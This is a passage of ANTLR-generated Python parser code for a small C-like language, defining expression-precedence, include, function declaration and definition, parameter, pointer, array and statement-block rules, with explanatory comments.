            self.match(SmallCParser.T__14)
            self.state = 216
            self.oplevel2()
            pass
        elif la_ == 2:
            # T__15 oplevel2 (prefix).
            self.enterOuterAlt(localctx, 2)
            self.state = 217
            self.match(SmallCParser.T__15)
            self.state = 218
            self.oplevel2()
            pass
        elif la_ == 3:
            # T__9 oplevel2 (prefix).
            self.enterOuterAlt(localctx, 3)
            self.state = 219
            self.match(SmallCParser.T__9)
            self.state = 220
            self.oplevel2()
            pass
        elif la_ == 4:
            # T__10 oplevel2 (prefix).
            self.enterOuterAlt(localctx, 4)
            self.state = 221
            self.match(SmallCParser.T__10)
            self.state = 222
            self.oplevel2()
            pass
        elif la_ == 5:
            # T__16 oplevel1 — note the operand is oplevel1, not oplevel2.
            self.enterOuterAlt(localctx, 5)
            self.state = 223
            self.match(SmallCParser.T__16)
            self.state = 224
            self.oplevel1(0)
            pass
        elif la_ == 6:
            # T__11 oplevel2 (prefix).
            self.enterOuterAlt(localctx, 6)
            self.state = 225
            self.match(SmallCParser.T__11)
            self.state = 226
            self.oplevel2()
            pass
        elif la_ == 7:
            # T__17 oplevel2 (prefix).
            self.enterOuterAlt(localctx, 7)
            self.state = 227
            self.match(SmallCParser.T__17)
            self.state = 228
            self.oplevel2()
            pass
        elif la_ == 8:
            self.enterOuterAlt(localctx, 8)
            self.state = 229
            self.functionCall()
            pass
        elif la_ == 9:
            # Cast: LBRA typeDeclaration RBRA oplevel2.
            self.enterOuterAlt(localctx, 9)
            self.state = 230
            self.match(SmallCParser.LBRA)
            self.state = 231
            self.typeDeclaration()
            self.state = 232
            self.match(SmallCParser.RBRA)
            self.state = 233
            self.oplevel2()
            pass
        elif la_ == 10:
            # Fallthrough to the primary level.
            self.enterOuterAlt(localctx, 10)
            self.state = 235
            self.oplevel1(0)
            pass
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class Oplevel1Context(ParserRuleContext):
    """Parse-tree node produced by the left-recursive ``oplevel1`` rule
    (primary expressions and postfix operators)."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def variable(self):
        return self.getTypedRuleContext(SmallCParser.VariableContext, 0)

    def floatLiteral(self):
        return self.getTypedRuleContext(SmallCParser.FloatLiteralContext, 0)

    def integerLiteral(self):
        return self.getTypedRuleContext(SmallCParser.IntegerLiteralContext, 0)

    def characterLiteral(self):
        return self.getTypedRuleContext(SmallCParser.CharacterLiteralContext, 0)

    def stringLiteral(self):
        return self.getTypedRuleContext(SmallCParser.StringLiteralContext, 0)

    def expression(self):
        # Parenthesised or index expression child.
        return self.getTypedRuleContext(SmallCParser.ExpressionContext, 0)

    def oplevel1(self):
        return self.getTypedRuleContext(SmallCParser.Oplevel1Context, 0)

    def getRuleIndex(self):
        return SmallCParser.RULE_oplevel1

    def enterRule(self, listener:ParseTreeListener):
        enter = getattr(listener, "enterOplevel1", None)
        if enter is not None:
            enter(self)

    def exitRule(self, listener:ParseTreeListener):
        leave = getattr(listener, "exitOplevel1", None)
        if leave is not None:
            leave(self)
def oplevel1(self, _p:int=0):
    """Parse the left-recursive rule ``oplevel1``: primaries + postfixes.

    ANTLR-generated.  The primary is chosen by plain lookahead: an
    identifier, a float/integer/character/string literal, or a
    parenthesised expression; anything else raises NoViableAltException.
    The loop then consumes postfix operators — T__14 (prec 9), T__15
    (prec 8), or LSBRA expression RSBRA indexing (prec 7).
    """
    _parentctx = self._ctx
    _parentState = self.state
    localctx = SmallCParser.Oplevel1Context(self, self._ctx, _parentState)
    _prevctx = localctx
    _startState = 28
    self.enterRecursionRule(localctx, 28, self.RULE_oplevel1, _p)
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 248
        token = self._input.LA(1)
        # Dispatch on the lookahead token to pick the primary form.
        if token in [SmallCParser.IDENTIFIER]:
            self.state = 239
            self.variable()
        elif token in [SmallCParser.FLOAT]:
            self.state = 240
            self.floatLiteral()
        elif token in [SmallCParser.INTEGER]:
            self.state = 241
            self.integerLiteral()
        elif token in [SmallCParser.CHARACTER]:
            self.state = 242
            self.characterLiteral()
        elif token in [SmallCParser.STRING]:
            self.state = 243
            self.stringLiteral()
        elif token in [SmallCParser.LBRA]:
            # '(' expression ')'
            self.state = 244
            self.match(SmallCParser.LBRA)
            self.state = 245
            self.expression()
            self.state = 246
            self.match(SmallCParser.RBRA)
        else:
            raise NoViableAltException(self)
        self._ctx.stop = self._input.LT(-1)
        self.state = 261
        self._errHandler.sync(self)
        _alt = self._interp.adaptivePredict(self._input,15,self._ctx)
        # Postfix loop: continue while prediction selects a suffix.
        while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
            if _alt==1:
                if self._parseListeners is not None:
                    self.triggerExitRuleEvent()
                _prevctx = localctx
                self.state = 259
                self._errHandler.sync(self);
                la_ = self._interp.adaptivePredict(self._input,14,self._ctx)
                if la_ == 1:
                    # oplevel1 T__14 (postfix, precedence 9).
                    localctx = SmallCParser.Oplevel1Context(self, _parentctx, _parentState)
                    self.pushNewRecursionContext(localctx, _startState, self.RULE_oplevel1)
                    self.state = 250
                    if not self.precpred(self._ctx, 9):
                        from antlr4.error.Errors import FailedPredicateException
                        raise FailedPredicateException(self, "self.precpred(self._ctx, 9)")
                    self.state = 251
                    self.match(SmallCParser.T__14)
                    pass
                elif la_ == 2:
                    # oplevel1 T__15 (postfix, precedence 8).
                    localctx = SmallCParser.Oplevel1Context(self, _parentctx, _parentState)
                    self.pushNewRecursionContext(localctx, _startState, self.RULE_oplevel1)
                    self.state = 252
                    if not self.precpred(self._ctx, 8):
                        from antlr4.error.Errors import FailedPredicateException
                        raise FailedPredicateException(self, "self.precpred(self._ctx, 8)")
                    self.state = 253
                    self.match(SmallCParser.T__15)
                    pass
                elif la_ == 3:
                    # oplevel1 '[' expression ']' (indexing, precedence 7).
                    localctx = SmallCParser.Oplevel1Context(self, _parentctx, _parentState)
                    self.pushNewRecursionContext(localctx, _startState, self.RULE_oplevel1)
                    self.state = 254
                    if not self.precpred(self._ctx, 7):
                        from antlr4.error.Errors import FailedPredicateException
                        raise FailedPredicateException(self, "self.precpred(self._ctx, 7)")
                    self.state = 255
                    self.match(SmallCParser.LSBRA)
                    self.state = 256
                    self.expression()
                    self.state = 257
                    self.match(SmallCParser.RSBRA)
                    pass
            self.state = 263
            self._errHandler.sync(self)
            _alt = self._interp.adaptivePredict(self._input,15,self._ctx)
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.unrollRecursionContexts(_parentctx)
    return localctx
class ProgramContext(ParserRuleContext):
    """Parse-tree node for the ``program`` start rule.

    Indexed accessors return either all children of a kind (``i is None``)
    or the i-th one.
    """

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def include(self, i:int=None):
        if i is None:
            return self.getTypedRuleContexts(SmallCParser.IncludeContext)
        return self.getTypedRuleContext(SmallCParser.IncludeContext, i)

    def functionDeclaration(self, i:int=None):
        if i is None:
            return self.getTypedRuleContexts(SmallCParser.FunctionDeclarationContext)
        return self.getTypedRuleContext(SmallCParser.FunctionDeclarationContext, i)

    def functionDefinition(self, i:int=None):
        if i is None:
            return self.getTypedRuleContexts(SmallCParser.FunctionDefinitionContext)
        return self.getTypedRuleContext(SmallCParser.FunctionDefinitionContext, i)

    def variableDeclaration(self, i:int=None):
        if i is None:
            return self.getTypedRuleContexts(SmallCParser.VariableDeclarationContext)
        return self.getTypedRuleContext(SmallCParser.VariableDeclarationContext, i)

    def getRuleIndex(self):
        return SmallCParser.RULE_program

    def enterRule(self, listener:ParseTreeListener):
        enter = getattr(listener, "enterProgram", None)
        if enter is not None:
            enter(self)

    def exitRule(self, listener:ParseTreeListener):
        leave = getattr(listener, "exitProgram", None)
        if leave is not None:
            leave(self)
def program(self):
    """Parse the ``program`` start rule.

    ANTLR-generated: repeats while the lookahead is one of T__19,
    TYPECHAR, TYPEFLOAT, TYPEINT, TYPEVOID or CONST, each iteration
    consuming an include, a function declaration, a function definition,
    or a variable declaration followed by T__18 (statement terminator).
    """
    localctx = SmallCParser.ProgramContext(self, self._ctx, self.state)
    self.enterRule(localctx, 30, self.RULE_program)
    self._la = 0 # Token type
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 272
        self._errHandler.sync(self)
        _la = self._input.LA(1)
        # Bitmask test: token type fits in 64 bits and is in the start set.
        while (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << SmallCParser.T__19) | (1 << SmallCParser.TYPECHAR) | (1 << SmallCParser.TYPEFLOAT) | (1 << SmallCParser.TYPEINT) | (1 << SmallCParser.TYPEVOID) | (1 << SmallCParser.CONST))) != 0):
            self.state = 270
            self._errHandler.sync(self);
            la_ = self._interp.adaptivePredict(self._input,16,self._ctx)
            if la_ == 1:
                self.state = 264
                self.include()
                pass
            elif la_ == 2:
                self.state = 265
                self.functionDeclaration()
                pass
            elif la_ == 3:
                self.state = 266
                self.functionDefinition()
                pass
            elif la_ == 4:
                # variableDeclaration T__18
                self.state = 267
                self.variableDeclaration()
                self.state = 268
                self.match(SmallCParser.T__18)
                pass
            self.state = 274
            self._errHandler.sync(self)
            _la = self._input.LA(1)
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class IncludeContext(ParserRuleContext):
    """Parse-tree node for the ``include`` rule."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def LABRA(self):
        return self.getToken(SmallCParser.LABRA, 0)

    def stdInclude(self):
        # Present for the <...> form of the include.
        return self.getTypedRuleContext(SmallCParser.StdIncludeContext, 0)

    def RABRA(self):
        return self.getToken(SmallCParser.RABRA, 0)

    def customInclude(self):
        # Present for the string-literal form of the include.
        return self.getTypedRuleContext(SmallCParser.CustomIncludeContext, 0)

    def getRuleIndex(self):
        return SmallCParser.RULE_include

    def enterRule(self, listener:ParseTreeListener):
        enter = getattr(listener, "enterInclude", None)
        if enter is not None:
            enter(self)

    def exitRule(self, listener:ParseTreeListener):
        leave = getattr(listener, "exitInclude", None)
        if leave is not None:
            leave(self)
def include(self):
    """Parse the ``include`` rule.

    ANTLR-generated.  Two alternatives, both starting with T__19
    (presumably the ``#include`` keyword — TODO confirm against the
    lexer): T__19 LABRA stdInclude RABRA, or T__19 customInclude.
    """
    localctx = SmallCParser.IncludeContext(self, self._ctx, self.state)
    self.enterRule(localctx, 32, self.RULE_include)
    try:
        self.state = 282
        self._errHandler.sync(self);
        la_ = self._interp.adaptivePredict(self._input,18,self._ctx)
        if la_ == 1:
            # T__19 '<' stdInclude '>'
            self.enterOuterAlt(localctx, 1)
            self.state = 275
            self.match(SmallCParser.T__19)
            self.state = 276
            self.match(SmallCParser.LABRA)
            self.state = 277
            self.stdInclude()
            self.state = 278
            self.match(SmallCParser.RABRA)
            pass
        elif la_ == 2:
            # T__19 customInclude (string-literal include)
            self.enterOuterAlt(localctx, 2)
            self.state = 280
            self.match(SmallCParser.T__19)
            self.state = 281
            self.customInclude()
            pass
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class StdIncludeContext(ParserRuleContext):
    """Parse-tree node for the ``stdInclude`` rule."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def identifier(self, i:int=None):
        # All identifier children, or the i-th one.
        if i is None:
            return self.getTypedRuleContexts(SmallCParser.IdentifierContext)
        return self.getTypedRuleContext(SmallCParser.IdentifierContext, i)

    def getRuleIndex(self):
        return SmallCParser.RULE_stdInclude

    def enterRule(self, listener:ParseTreeListener):
        enter = getattr(listener, "enterStdInclude", None)
        if enter is not None:
            enter(self)

    def exitRule(self, listener:ParseTreeListener):
        leave = getattr(listener, "exitStdInclude", None)
        if leave is not None:
            leave(self)
def stdInclude(self):
    """Parse rule ``stdInclude``: identifier T__20 identifier
    (e.g. a dotted header name — TODO confirm T__20 against the lexer)."""
    ctx = SmallCParser.StdIncludeContext(self, self._ctx, self.state)
    self.enterRule(ctx, 34, self.RULE_stdInclude)
    try:
        self.enterOuterAlt(ctx, 1)
        self.state = 284
        self.identifier()
        self.state = 285
        self.match(SmallCParser.T__20)
        self.state = 286
        self.identifier()
    except RecognitionException as err:
        ctx.exception = err
        self._errHandler.reportError(self, err)
        self._errHandler.recover(self, err)
    finally:
        self.exitRule()
    return ctx
class CustomIncludeContext(ParserRuleContext):
    """Parse-tree node for the ``customInclude`` rule."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def stringLiteral(self):
        return self.getTypedRuleContext(SmallCParser.StringLiteralContext, 0)

    def getRuleIndex(self):
        return SmallCParser.RULE_customInclude

    def enterRule(self, listener:ParseTreeListener):
        enter = getattr(listener, "enterCustomInclude", None)
        if enter is not None:
            enter(self)

    def exitRule(self, listener:ParseTreeListener):
        leave = getattr(listener, "exitCustomInclude", None)
        if leave is not None:
            leave(self)
def customInclude(self):
    """Parse rule ``customInclude`` — a single string literal."""
    ctx = SmallCParser.CustomIncludeContext(self, self._ctx, self.state)
    self.enterRule(ctx, 36, self.RULE_customInclude)
    try:
        self.enterOuterAlt(ctx, 1)
        self.state = 288
        self.stringLiteral()
    except RecognitionException as err:
        ctx.exception = err
        self._errHandler.reportError(self, err)
        self._errHandler.recover(self, err)
    finally:
        self.exitRule()
    return ctx
class FunctionDeclarationContext(ParserRuleContext):
    """Parse-tree node for the ``functionDeclaration`` rule."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def identifier(self):
        return self.getTypedRuleContext(SmallCParser.IdentifierContext, 0)

    def LBRA(self):
        return self.getToken(SmallCParser.LBRA, 0)

    def parameters(self):
        return self.getTypedRuleContext(SmallCParser.ParametersContext, 0)

    def RBRA(self):
        return self.getToken(SmallCParser.RBRA, 0)

    def declarationSpecifier(self, i:int=None):
        if i is None:
            return self.getTypedRuleContexts(SmallCParser.DeclarationSpecifierContext)
        return self.getTypedRuleContext(SmallCParser.DeclarationSpecifierContext, i)

    def pointerPart(self, i:int=None):
        if i is None:
            return self.getTypedRuleContexts(SmallCParser.PointerPartContext)
        return self.getTypedRuleContext(SmallCParser.PointerPartContext, i)

    def getRuleIndex(self):
        return SmallCParser.RULE_functionDeclaration

    def enterRule(self, listener:ParseTreeListener):
        enter = getattr(listener, "enterFunctionDeclaration", None)
        if enter is not None:
            enter(self)

    def exitRule(self, listener:ParseTreeListener):
        leave = getattr(listener, "exitFunctionDeclaration", None)
        if leave is not None:
            leave(self)
def functionDeclaration(self):
    """Parse the ``functionDeclaration`` rule.

    ANTLR-generated: declarationSpecifier+ pointerPart* identifier
    LBRA parameters RBRA T__18 (the trailing terminator token).
    """
    localctx = SmallCParser.FunctionDeclarationContext(self, self._ctx, self.state)
    self.enterRule(localctx, 38, self.RULE_functionDeclaration)
    self._la = 0 # Token type
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 291
        self._errHandler.sync(self)
        _la = self._input.LA(1)
        # (declarationSpecifier)+ — at least one type/const specifier.
        while True:
            self.state = 290
            self.declarationSpecifier()
            self.state = 293
            self._errHandler.sync(self)
            _la = self._input.LA(1)
            if not ((((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << SmallCParser.TYPECHAR) | (1 << SmallCParser.TYPEFLOAT) | (1 << SmallCParser.TYPEINT) | (1 << SmallCParser.TYPEVOID) | (1 << SmallCParser.CONST))) != 0)):
                break
        self.state = 298
        self._errHandler.sync(self)
        _la = self._input.LA(1)
        # (pointerPart)* — T__11 is the pointer token; TODO confirm it is '*'.
        while _la==SmallCParser.T__11:
            self.state = 295
            self.pointerPart()
            self.state = 300
            self._errHandler.sync(self)
            _la = self._input.LA(1)
        self.state = 301
        self.identifier()
        self.state = 302
        self.match(SmallCParser.LBRA)
        self.state = 303
        self.parameters()
        self.state = 304
        self.match(SmallCParser.RBRA)
        self.state = 305
        self.match(SmallCParser.T__18)
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class FunctionDefinitionContext(ParserRuleContext):
    """Parse-tree node for the ``functionDefinition`` rule."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def identifier(self):
        return self.getTypedRuleContext(SmallCParser.IdentifierContext, 0)

    def LBRA(self):
        return self.getToken(SmallCParser.LBRA, 0)

    def parameters(self):
        return self.getTypedRuleContext(SmallCParser.ParametersContext, 0)

    def RBRA(self):
        return self.getToken(SmallCParser.RBRA, 0)

    def statements(self):
        # The function body.
        return self.getTypedRuleContext(SmallCParser.StatementsContext, 0)

    def declarationSpecifier(self, i:int=None):
        if i is None:
            return self.getTypedRuleContexts(SmallCParser.DeclarationSpecifierContext)
        return self.getTypedRuleContext(SmallCParser.DeclarationSpecifierContext, i)

    def pointerPart(self, i:int=None):
        if i is None:
            return self.getTypedRuleContexts(SmallCParser.PointerPartContext)
        return self.getTypedRuleContext(SmallCParser.PointerPartContext, i)

    def getRuleIndex(self):
        return SmallCParser.RULE_functionDefinition

    def enterRule(self, listener:ParseTreeListener):
        enter = getattr(listener, "enterFunctionDefinition", None)
        if enter is not None:
            enter(self)

    def exitRule(self, listener:ParseTreeListener):
        leave = getattr(listener, "exitFunctionDefinition", None)
        if leave is not None:
            leave(self)
def functionDefinition(self):
    """Parse the ``functionDefinition`` rule.

    ANTLR-generated: declarationSpecifier+ pointerPart* identifier
    LBRA parameters RBRA statements — same shape as functionDeclaration
    but ending in a body instead of a terminator.
    """
    localctx = SmallCParser.FunctionDefinitionContext(self, self._ctx, self.state)
    self.enterRule(localctx, 40, self.RULE_functionDefinition)
    self._la = 0 # Token type
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 308
        self._errHandler.sync(self)
        _la = self._input.LA(1)
        # (declarationSpecifier)+ — at least one type/const specifier.
        while True:
            self.state = 307
            self.declarationSpecifier()
            self.state = 310
            self._errHandler.sync(self)
            _la = self._input.LA(1)
            if not ((((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << SmallCParser.TYPECHAR) | (1 << SmallCParser.TYPEFLOAT) | (1 << SmallCParser.TYPEINT) | (1 << SmallCParser.TYPEVOID) | (1 << SmallCParser.CONST))) != 0)):
                break
        self.state = 315
        self._errHandler.sync(self)
        _la = self._input.LA(1)
        # (pointerPart)* — zero or more pointer markers (token T__11).
        while _la==SmallCParser.T__11:
            self.state = 312
            self.pointerPart()
            self.state = 317
            self._errHandler.sync(self)
            _la = self._input.LA(1)
        self.state = 318
        self.identifier()
        self.state = 319
        self.match(SmallCParser.LBRA)
        self.state = 320
        self.parameters()
        self.state = 321
        self.match(SmallCParser.RBRA)
        self.state = 322
        self.statements()
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class ParametersContext(ParserRuleContext):
    """Parse-tree node for the ``parameters`` rule."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def parameter(self, i:int=None):
        # All parameter children, or the i-th one.
        if i is None:
            return self.getTypedRuleContexts(SmallCParser.ParameterContext)
        return self.getTypedRuleContext(SmallCParser.ParameterContext, i)

    def getRuleIndex(self):
        return SmallCParser.RULE_parameters

    def enterRule(self, listener:ParseTreeListener):
        enter = getattr(listener, "enterParameters", None)
        if enter is not None:
            enter(self)

    def exitRule(self, listener:ParseTreeListener):
        leave = getattr(listener, "exitParameters", None)
        if leave is not None:
            leave(self)
def parameters(self):
    """Parse the ``parameters`` rule.

    ANTLR-generated.  Three predicted alternatives: an empty list
    (alt 1), ``parameter (COMMA parameter)*`` (alt 2), or another empty
    alternative (alt 3) — alts 1 and 3 consume no tokens.
    """
    localctx = SmallCParser.ParametersContext(self, self._ctx, self.state)
    self.enterRule(localctx, 42, self.RULE_parameters)
    self._la = 0 # Token type
    try:
        self.state = 334
        self._errHandler.sync(self);
        la_ = self._interp.adaptivePredict(self._input,24,self._ctx)
        if la_ == 1:
            # Empty parameter list.
            self.enterOuterAlt(localctx, 1)
            pass
        elif la_ == 2:
            # parameter (COMMA parameter)*
            self.enterOuterAlt(localctx, 2)
            self.state = 325
            self.parameter()
            self.state = 330
            self._errHandler.sync(self)
            _la = self._input.LA(1)
            while _la==SmallCParser.COMMA:
                self.state = 326
                self.match(SmallCParser.COMMA)
                self.state = 327
                self.parameter()
                self.state = 332
                self._errHandler.sync(self)
                _la = self._input.LA(1)
            pass
        elif la_ == 3:
            # Empty alternative (no tokens consumed).
            self.enterOuterAlt(localctx, 3)
            pass
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class ParameterContext(ParserRuleContext):
    """Parse-tree node produced by the 'parameter' grammar rule."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def getRuleIndex(self):
        return SmallCParser.RULE_parameter

    def declarationSpecifier(self, i:int=None):
        # No index: return all declarationSpecifier children; otherwise the i-th.
        if i is None:
            return self.getTypedRuleContexts(SmallCParser.DeclarationSpecifierContext)
        return self.getTypedRuleContext(SmallCParser.DeclarationSpecifierContext, i)

    def pointerPart(self, i:int=None):
        if i is None:
            return self.getTypedRuleContexts(SmallCParser.PointerPartContext)
        return self.getTypedRuleContext(SmallCParser.PointerPartContext, i)

    def identifier(self):
        return self.getTypedRuleContext(SmallCParser.IdentifierContext, 0)

    def arrayPart(self):
        return self.getTypedRuleContext(SmallCParser.ArrayPartContext, 0)

    def enterRule(self, listener:ParseTreeListener):
        # Notify the listener only if it implements this hook.
        if hasattr(listener, "enterParameter"):
            listener.enterParameter(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr(listener, "exitParameter"):
            listener.exitParameter(self)
def parameter(self):
    """Parse the 'parameter' rule and return its ParameterContext."""

    localctx = SmallCParser.ParameterContext(self, self._ctx, self.state)
    self.enterRule(localctx, 44, self.RULE_parameter)
    self._la = 0 # Token type
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 337
        self._errHandler.sync(self)
        _la = self._input.LA(1)
        # One or more declaration specifiers (type keywords / const).
        while True:
            self.state = 336
            self.declarationSpecifier()
            self.state = 339
            self._errHandler.sync(self)
            _la = self._input.LA(1)
            # Bitmask membership test: keep looping while the lookahead is a specifier token.
            if not ((((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << SmallCParser.TYPECHAR) | (1 << SmallCParser.TYPEFLOAT) | (1 << SmallCParser.TYPEINT) | (1 << SmallCParser.TYPEVOID) | (1 << SmallCParser.CONST))) != 0)):
                break
        self.state = 344
        self._errHandler.sync(self)
        _la = self._input.LA(1)
        # Zero or more pointer parts.
        while _la==SmallCParser.T__11:
            self.state = 341
            self.pointerPart()
            self.state = 346
            self._errHandler.sync(self)
            _la = self._input.LA(1)
        self.state = 348
        _la = self._input.LA(1)
        # Optional parameter name.
        if _la==SmallCParser.IDENTIFIER:
            self.state = 347
            self.identifier()
        self.state = 351
        _la = self._input.LA(1)
        # Optional array suffix.
        if _la==SmallCParser.LSBRA:
            self.state = 350
            self.arrayPart()
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class PointerPartContext(ParserRuleContext):
    """Parse-tree node produced by the 'pointerPart' grammar rule."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def getRuleIndex(self):
        return SmallCParser.RULE_pointerPart

    def pointer(self):
        return self.getTypedRuleContext(SmallCParser.PointerContext, 0)

    def cvQualifier(self):
        return self.getTypedRuleContext(SmallCParser.CvQualifierContext, 0)

    def enterRule(self, listener:ParseTreeListener):
        # Notify the listener only if it implements this hook.
        if hasattr(listener, "enterPointerPart"):
            listener.enterPointerPart(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr(listener, "exitPointerPart"):
            listener.exitPointerPart(self)
def pointerPart(self):
    """Parse the 'pointerPart' rule (pointer, then optional const qualifier)."""

    localctx = SmallCParser.PointerPartContext(self, self._ctx, self.state)
    self.enterRule(localctx, 46, self.RULE_pointerPart)
    self._la = 0 # Token type
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 353
        self.pointer()
        self.state = 355
        _la = self._input.LA(1)
        # Optional cv-qualifier after the pointer.
        if _la==SmallCParser.CONST:
            self.state = 354
            self.cvQualifier()
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class ArrayPartContext(ParserRuleContext):
    """Parse-tree node produced by the 'arrayPart' grammar rule."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def getRuleIndex(self):
        return SmallCParser.RULE_arrayPart

    def LSBRA(self):
        return self.getToken(SmallCParser.LSBRA, 0)

    def RSBRA(self):
        return self.getToken(SmallCParser.RSBRA, 0)

    def expression(self):
        return self.getTypedRuleContext(SmallCParser.ExpressionContext, 0)

    def enterRule(self, listener:ParseTreeListener):
        # Notify the listener only if it implements this hook.
        if hasattr(listener, "enterArrayPart"):
            listener.enterArrayPart(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr(listener, "exitArrayPart"):
            listener.exitArrayPart(self)
def arrayPart(self):
    """Parse the 'arrayPart' rule: '[' with an optional expression, then ']'."""

    localctx = SmallCParser.ArrayPartContext(self, self._ctx, self.state)
    self.enterRule(localctx, 48, self.RULE_arrayPart)
    self._la = 0 # Token type
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 357
        self.match(SmallCParser.LSBRA)
        self.state = 359
        _la = self._input.LA(1)
        # Bitmask test: parse the size expression only if the lookahead can start one.
        if (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << SmallCParser.T__9) | (1 << SmallCParser.T__10) | (1 << SmallCParser.T__11) | (1 << SmallCParser.T__14) | (1 << SmallCParser.T__15) | (1 << SmallCParser.T__16) | (1 << SmallCParser.T__17) | (1 << SmallCParser.LBRA) | (1 << SmallCParser.INTEGER) | (1 << SmallCParser.FLOAT) | (1 << SmallCParser.IDENTIFIER) | (1 << SmallCParser.CHARACTER) | (1 << SmallCParser.STRING))) != 0):
            self.state = 358
            self.expression()
        self.state = 361
        self.match(SmallCParser.RSBRA)
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class StatementsContext(ParserRuleContext):
    """Parse-tree node produced by the 'statements' grammar rule (a braced block)."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def getRuleIndex(self):
        return SmallCParser.RULE_statements

    def LCBRA(self):
        return self.getToken(SmallCParser.LCBRA, 0)

    def RCBRA(self):
        return self.getToken(SmallCParser.RCBRA, 0)

    def statement(self, i:int=None):
        # No index: return every statement child; otherwise the i-th one.
        if i is None:
            return self.getTypedRuleContexts(SmallCParser.StatementContext)
        return self.getTypedRuleContext(SmallCParser.StatementContext, i)

    def enterRule(self, listener:ParseTreeListener):
        # Notify the listener only if it implements this hook.
        if hasattr(listener, "enterStatements"):
            listener.enterStatements(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr(listener, "exitStatements"):
            listener.exitStatements(self)
def statements(self):
    """Parse the 'statements' rule: '{' statement* '}'."""

    localctx = SmallCParser.StatementsContext(self, self._ctx, self.state)
    self.enterRule(localctx, 50, self.RULE_statements)
    self._la = 0 # Token type
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 363
        self.match(SmallCParser.LCBRA)
        self.state = 367
        self._errHandler.sync(self)
        _la = self._input.LA(1)
        # Bitmask test: loop while the lookahead token can start a statement.
        while (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << SmallCParser.T__9) | (1 << SmallCParser.T__10) | (1 << SmallCParser.T__11) | (1 << SmallCParser.T__14) | (1 << SmallCParser.T__15) | (1 << SmallCParser.T__16) | (1 << SmallCParser.T__17) | (1 << SmallCParser.T__18) | (1 << SmallCParser.LBRA) | (1 << SmallCParser.LCBRA) | (1 << SmallCParser.TYPECHAR) | (1 << SmallCParser.TYPEFLOAT) | (1 << SmallCParser.TYPEINT) | (1 << SmallCParser.TYPEVOID) | (1 << SmallCParser.CONST) | (1 << SmallCParser.IF) | (1 << SmallCParser.DO) | (1 << SmallCParser.WHILE) | (1 << SmallCParser.FOR) | (1 << SmallCParser.RETURN) | (1 << SmallCParser.INTEGER) | (1 << SmallCParser.FLOAT) | (1 << SmallCParser.IDENTIFIER) | (1 << SmallCParser.CHARACTER) | (1 << SmallCParser.STRING))) != 0):
            self.state = 364
            self.statement()
            self.state = 369
            self._errHandler.sync(self)
            _la = self._input.LA(1)
        self.state = 370
        self.match(SmallCParser.RCBRA)
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class StatementContext(ParserRuleContext):
